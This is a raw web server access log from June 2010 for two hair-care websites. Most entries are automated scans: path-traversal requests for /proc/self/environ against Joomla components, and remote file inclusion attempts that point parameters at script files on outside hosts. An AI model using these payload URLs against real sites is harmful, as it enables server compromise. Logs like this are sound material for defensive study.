211.43.212.56 - - [20/Jun/2010:18:14:35 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
68.127.243.75 - - [20/Jun/2010:18:14:36 -0700] "GET /logs/access_091123.log HTTP/1.1" 200 1294739 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)" "growlonghairfast.com"
174.121.176.46 - - [20/Jun/2010:18:14:41 -0700] "GET /logs/access_100531.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.176.46 - - [20/Jun/2010:18:14:41 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.176.46 - - [20/Jun/2010:18:14:41 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.176.46 - - [20/Jun/2010:18:14:45 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.176.46 - - [20/Jun/2010:18:14:45 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.176.46 - - [20/Jun/2010:18:14:45 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
114.108.151.149 - - [20/Jun/2010:18:15:07 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [20/Jun/2010:18:15:09 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
114.108.151.149 - - [20/Jun/2010:18:15:09 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:18:16:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12573 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
211.43.212.49 - - [20/Jun/2010:18:16:36 -0700] "GET /logs/access.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.49 - - [20/Jun/2010:18:16:37 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.49 - - [20/Jun/2010:18:16:37 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:17:16 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:17:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:17:17 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:17:50 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:17:50 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:17:51 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
66.84.0.141 - - [20/Jun/2010:18:19:01 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:18:19:39 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:18:19:45 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
66.84.0.141 - - [20/Jun/2010:18:19:57 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
78.110.50.135 - - [20/Jun/2010:18:20:53 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [20/Jun/2010:18:20:53 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [20/Jun/2010:18:20:53 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.rofmma.com/new/robots.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
78.110.50.135 - - [20/Jun/2010:18:21:36 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
211.43.212.49 - - [20/Jun/2010:18:21:46 -0700] "GET /logs/access_100531.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.49 - - [20/Jun/2010:18:21:47 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.49 - - [20/Jun/2010:18:21:48 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
66.84.0.141 - - [20/Jun/2010:18:22:41 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
178.208.83.28 - - [20/Jun/2010:18:22:53 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:18:23:17 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.208.83.28 - - [20/Jun/2010:18:23:52 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
66.84.0.141 - - [20/Jun/2010:18:24:28 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
178.208.83.28 - - [20/Jun/2010:18:24:33 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:26:31 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:26:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:26:33 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:26:34 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:26:35 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
211.43.212.56 - - [20/Jun/2010:18:26:36 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.freehairsecrets.com"
114.108.151.149 - - [20/Jun/2010:18:26:57 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [20/Jun/2010:18:26:58 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
114.108.151.149 - - [20/Jun/2010:18:26:58 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:27:56 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:27:56 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:27:57 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:28:07 -0700] "GET /logs/access_100531.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:28:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
211.43.212.56 - - [20/Jun/2010:18:28:08 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "growlonghairfast.com"
203.120.246.20 - - [20/Jun/2010:18:28:55 -0700] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.120.246.20 - - [20/Jun/2010:18:28:55 -0700] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
203.120.246.20 - - [20/Jun/2010:18:28:55 -0700] "GET /logs/access_100405.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:18:32:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15284 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:18:33:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3327 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.78.118.123 - - [20/Jun/2010:18:34:26 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [20/Jun/2010:18:34:26 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [20/Jun/2010:18:34:27 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.78.118.123 - - [20/Jun/2010:18:37:25 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [20/Jun/2010:18:37:25 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
121.78.118.123 - - [20/Jun/2010:18:37:26 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
89.111.177.32 - - [20/Jun/2010:18:39:16 -0700] "GET /logs/access_100222.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
89.111.177.32 - - [20/Jun/2010:18:39:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
89.111.177.32 - - [20/Jun/2010:18:39:17 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:18:44:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14278 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:18:55:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12182 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:19:06:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12881 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:19:07:59 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17789 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
62.182.63.49 - - [20/Jun/2010:19:18:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.182.63.49 - - [20/Jun/2010:19:19:05 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:19:19:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14396 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
217.112.35.54 - - [20/Jun/2010:19:19:38 -0700] "GET /logs/access_091019.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
217.112.35.54 - - [20/Jun/2010:19:19:39 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
217.112.35.54 - - [20/Jun/2010:19:19:39 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.supersmart.co.za/components/com_admin/.administrator/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:19:31:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12490 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
201.116.197.150 - - [20/Jun/2010:19:32:15 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
62.182.63.49 - - [20/Jun/2010:19:37:21 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.182.63.49 - - [20/Jun/2010:19:37:21 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.182.63.49 - - [20/Jun/2010:19:37:22 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.182.63.49 - - [20/Jun/2010:19:39:19 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
62.182.63.49 - - [20/Jun/2010:19:39:19 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
62.182.63.49 - - [20/Jun/2010:19:39:20 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
78.30.202.210 - - [20/Jun/2010:19:40:03 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) Opera 6.01 [en]" "www.freehairsecrets.com"
77.88.25.28 - - [20/Jun/2010:19:42:34 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6548 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [20/Jun/2010:19:42:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13355 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
194.201.253.2 - - [20/Jun/2010:19:48:57 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.201.253.2 - - [20/Jun/2010:19:48:57 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.201.253.2 - - [20/Jun/2010:19:48:57 -0700] "GET /include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
201.116.197.150 - - [20/Jun/2010:19:50:25 -0700] "GET /logs/access_100426.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
201.116.197.150 - - [20/Jun/2010:19:50:26 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
201.116.197.150 - - [20/Jun/2010:19:50:26 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
194.201.253.2 - - [20/Jun/2010:19:51:03 -0700] "GET /include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
194.201.253.2 - - [20/Jun/2010:19:51:03 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://sportsulsan.co.kr/poll/aipi/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
